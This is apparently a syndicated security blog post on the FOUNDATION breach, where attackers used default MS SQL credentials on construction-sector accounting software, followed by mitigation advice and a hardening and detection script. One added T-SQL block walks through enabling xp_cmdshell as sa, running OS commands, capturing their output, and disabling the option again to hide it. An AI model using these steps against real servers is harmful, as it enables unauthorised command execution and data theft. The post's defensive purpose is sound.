
FOUNDATION Breach: Default Credentials Exploited By Hackers
Huntress, a cybersecurity platform, has recently uncovered the FOUNDATION breach, in which threat actors are leveraging default credentials. According to media reports, the targets so far are companies across the construction sector.
In this article, we’ll cover how hackers are able to conduct these construction sector cyber attacks and what can be done to mitigate the threat. Let’s begin!
Initial Discovery Of The Construction Sector Cyber Attacks
The FOUNDATION breach attacks were initially discovered on September 14th, 2024. On the first compromised host, around 35,000 login attempts were recorded against the MS SQL server before the attackers gained initial access.
It’s worth mentioning here that Huntress found the FOUNDATION software running on roughly 500 hosts. Of those 500, 33 were publicly accessible with their default credentials still in place.
FOUNDATION Breach: Cybersecurity Findings
FOUNDATION is accounting software used across the construction sector that ships with a Microsoft SQL Server (MS SQL) instance, which handles its database operations.
The installation can be configured to open TCP port 4243 so that FOUNDATION’s mobile app can reach the database directly; where that port is reachable from the internet, so is the SQL login surface. Huntress has stated that the installation includes two accounts with high-level privileges.
These are “sa,” the built-in MS SQL system administrator login, and a “dba” account created by FOUNDATION. The breach observations revealed that both accounts are routinely left with their default credentials unchanged.
The Brute Force Exploit
Because these credentials are left unchanged, an attacker who can reach the exposed SQL port does not have to guess much: the product’s documented defaults work, and Huntress observed attackers brute-forcing at scale and then authenticating with exactly those defaults. Once authenticated as sa, which holds the sysadmin role, the attacker can enable the xp_cmdshell extended stored procedure (it is disabled by default, but a sysadmin can switch it on at runtime with sp_configure) and use it to run arbitrary operating-system commands on the host under the SQL Server service account.
Media reports indicate that the targeted sub-industries within construction include Heating, Ventilation, and Air Conditioning (HVAC), concrete, plumbing, and others.
Huntress has described both how the attackers get in and what xp_cmdshell, the procedure they abuse afterwards, does. On initial access:
“Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials.”
And on xp_cmdshell:
“This is an extended stored procedure that allows the execution of OS commands directly from SQL, enabling users to run shell commands and scripts as if they had access right from the system command prompt.”
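To make the chain concrete, here is an added T-SQL example of what an attacker can do once authenticated to the exposed instance as sa. It is not code from the original post or from Huntress’s report; the commands handed to xp_cmdshell (whoami, ipconfig, dir) are placeholders chosen for illustration, and the behaviour shown is standard MS SQL Server behaviour rather than anything specific to FOUNDATION.

```sql
-- Added illustration, not from Huntress's report: post-authentication
-- actions available to an attacker holding the 'sa' login on an exposed
-- MS SQL instance. The commands passed to xp_cmdshell are placeholders.

-- 0. Confirm the login is in the sysadmin fixed server role (1 = yes).
--    Only sysadmin can change server configuration options.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       SUSER_SNAME()                AS login_name,
       @@VERSION                    AS version;

-- 1. xp_cmdshell is an "advanced option" and is OFF by default. A sysadmin
--    can enable it at runtime with sp_configure; no service restart needed.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 2. Anything passed here runs on the host as the SQL Server service
--    account. Each line of stdout comes back as a row; a trailing NULL row
--    marks the end of the output.
EXEC master.dbo.xp_cmdshell 'whoami';
EXEC master.dbo.xp_cmdshell 'hostname && ipconfig /all';

-- 3. Output can also be captured into a table, which is how results are
--    typically collected for parsing or exfiltration over the same channel.
CREATE TABLE #out (line nvarchar(4000));
INSERT INTO #out EXEC master.dbo.xp_cmdshell 'dir C:\';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- 4. Switching the option back off afterwards hides the change from a
--    casual sys.configurations check, which is why the option's current
--    value on its own is a weak indicator of compromise.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Two points worth noting for defenders: step 1 leaves no trace in the application itself, only in the SQL Server error log and in any auditing of sp_configure, and step 4 shows why “xp_cmdshell is currently off” does not prove it was never used.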
Default Credential Vulnerability Mitigation And Protection
Such attacks pose a significant risk to businesses across the construction sector, and falling prey to them can lead to operational disruption, reputational damage, and legal repercussions. Beyond maintaining a broader cyber security strategy, organizations running FOUNDATION (or any MS SQL instance reachable from the internet) should:
- Keep xp_cmdshell disabled unless there is a documented need for it, and verify that it stays disabled. It is off by default, so finding it enabled is itself a signal worth investigating.
- Change the default passwords on the sa and dba logins to long, unique values and rotate them on a schedule; where the application does not depend on the sa login, disable it outright.
- Stop exposing the application and its database port, including TCP 4243, to the public internet; if mobile access is genuinely required, place it behind a VPN or a strict source-address allow-list.
- Monitor the SQL Server error log for bursts of failed logins (error 18456) from a single source address; the 35,000 attempts recorded on the first compromised host are the pattern to alert on.
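The following T-SQL, added here as an example and not taken from the original post or from FOUNDATION’s own documentation, shows how to verify and apply the xp_cmdshell and credential points on an instance like the one described in the findings section (the sa and dba logins), and how to pull failed-login counts per source address out of the SQL Server error log to spot the kind of login storm recorded on the first compromised host. The placeholder passwords, the assumption that the FOUNDATION-created login is literally named dba, and the alert threshold of 100 failures are assumptions to adjust for your instance. It runs as a sysadmin login.

```sql
-- Added hardening and audit script for an MS SQL instance such as the one
-- FOUNDATION bundles. Run as a sysadmin login. Not from the original post
-- or the vendor; the placeholder passwords, the 'dba' login name (confirm
-- it on your instance) and the failure threshold are assumptions.

-- 1. Current state of xp_cmdshell. value_in_use = 1 means enabled.
--    It is 0 by default, so a 1 here deserves an explanation.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Disable it and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Replace the default passwords on both privileged logins. Disabling
--    'sa' removes the best-known target, but first create a separately
--    named sysadmin login for administration and confirm that the
--    application itself does not connect as 'sa'.
ALTER LOGIN sa  WITH PASSWORD = N'<new-long-random-password-1>';
ALTER LOGIN sa  DISABLE;
ALTER LOGIN dba WITH PASSWORD = N'<new-long-random-password-2>';

-- 4. List every login in the sysadmin role, so no other default or
--    forgotten account keeps the same reach as 'sa'.
SELECT m.name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals  AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals  AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 5. Failed logins per login name and source address from the current
--    error log (log 0; pass 1, 2, ... for older archived logs). Each
--    failure produces an error 18456 entry plus a line of the form
--    "Login failed for user 'sa'. Reason: ... [CLIENT: 203.0.113.5]".
CREATE TABLE #errlog (LogDate datetime, ProcessInfo nvarchar(100), [Text] nvarchar(max));
INSERT INTO #errlog
    EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed for user';

SELECT c.login_name,
       c.client_ip,
       COUNT(*)       AS failures,
       MIN(e.LogDate) AS first_seen,
       MAX(e.LogDate) AS last_seen
FROM #errlog AS e
-- Positions of the "user '" and "[CLIENT: " markers; NULL when absent, so
-- the SUBSTRING calls below yield NULL instead of erroring on odd lines.
CROSS APPLY (SELECT NULLIF(CHARINDEX('user ''',   e.[Text]), 0) AS u,
                    NULLIF(CHARINDEX('[CLIENT: ', e.[Text]), 0) AS p) AS s
CROSS APPLY (SELECT SUBSTRING(e.[Text], s.u + 6,
                        NULLIF(CHARINDEX('''', e.[Text], s.u + 6), 0) - s.u - 6) AS login_name,
                    SUBSTRING(e.[Text], s.p + 9,
                        NULLIF(CHARINDEX(']',  e.[Text], s.p), 0) - s.p - 9)     AS client_ip) AS c
WHERE c.client_ip IS NOT NULL
GROUP BY c.login_name, c.client_ip
HAVING COUNT(*) >= 100          -- assumed alert threshold; tune per environment
ORDER BY failures DESC;

DROP TABLE #errlog;
```

The third mitigation, taking the application and TCP 4243 off the public internet, is a firewall and network change rather than a database one and is not covered by this script. Note also that step 5 only sees what the error log still holds: a busy instance with default log rotation can cycle through tens of thousands of failure lines quickly, so for ongoing detection ship the error log (or the failed-login audit events) to a central collector rather than querying it ad hoc.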
Conclusion
The FOUNDATION breach serves as a stark reminder of the risk that unchanged default credentials and an internet-exposed database port pose, in the construction sector and anywhere else bundled database servers are deployed. By changing and rotating default credentials, keeping xp_cmdshell disabled, and taking database ports off the public internet, organizations can mitigate this risk and protect themselves from future attacks of the same kind, keeping their operations secure and reliable.
The sources for this piece include articles in The Hacker News and The Record.
The post FOUNDATION Breach: Default Credentials Exploited By Hackers appeared first on TuxCare.
*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/foundation-breach-default-credentials-exploited-by-hackers/